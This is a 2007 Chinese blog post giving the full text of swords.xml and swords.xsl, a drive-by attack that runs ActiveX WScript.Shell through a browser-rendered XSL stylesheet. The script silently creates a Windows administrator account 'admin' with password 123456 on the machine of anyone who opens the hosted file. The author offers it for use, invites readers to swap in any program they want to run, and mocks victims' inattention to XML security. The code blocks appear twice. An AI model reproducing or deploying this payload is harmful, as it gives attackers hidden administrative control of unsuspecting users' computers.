上一篇
下一篇
利用xml+xsl給客戶機添加超級管理帳戶
作者:tank 日期:2007-03-17
穩萊
利用xml+xsl給客戶機添加超級管理帳戶
用法:把swords.xml和swords.xsl放在一個普通空間,相信很少人會注意xml的安全性吧,嘎嘎,只要把你想運行的程式添加到run() 即可,默認支持js和vbs.
這個程式加了一個用戶為 admin,密碼為123456的超級管理員帳號。
swords.xml
<?xml version="1.0" encoding=">BIG5"?>
<?xml-stylesheet type="text/xsl" href="swords.xsl"?>
<name>I am swords,I am admin!</name>
<?xml version="1.0" encoding=">BIG5"?>
<?xml-stylesheet type="text/xsl" href="swords.xsl"?>
<name>I am swords,I am admin!</name>
swords.xsl
<?xml version="1.0" encoding="BIG5"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:template match="/">
<html>
<body>
<xsl:value-of select="name" />
<xsl:script>
function run()
{
var wsh;
var wsh = new ActiveXObject("WScript.Shell");
wsh.run( "net user admin 123456 /add",0);
wsh.run( "net localgroup administrators admin /add",0);
wsh.run( "cmd.exe /c echo test!");
}
</xsl:script>
<xsl:eval>run()</xsl:eval>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
<?xml version="1.0" encoding="BIG5"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:template match="/">
<html>
<body>
<xsl:value-of select="name" />
<xsl:script>
function run()
{
var wsh;
var wsh = new ActiveXObject("WScript.Shell");
wsh.run( "net user admin 123456 /add",0);
wsh.run( "net localgroup administrators admin /add",0);
wsh.run( "cmd.exe /c echo test!");
}
</xsl:script>
<xsl:eval>run()</xsl:eval>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
給當前日誌評分:
正在讀取評分資料...
文章來自: 
引用通告: 
Tags: 評論: 0 | 引用: 0 | 查看次數: -
發表評論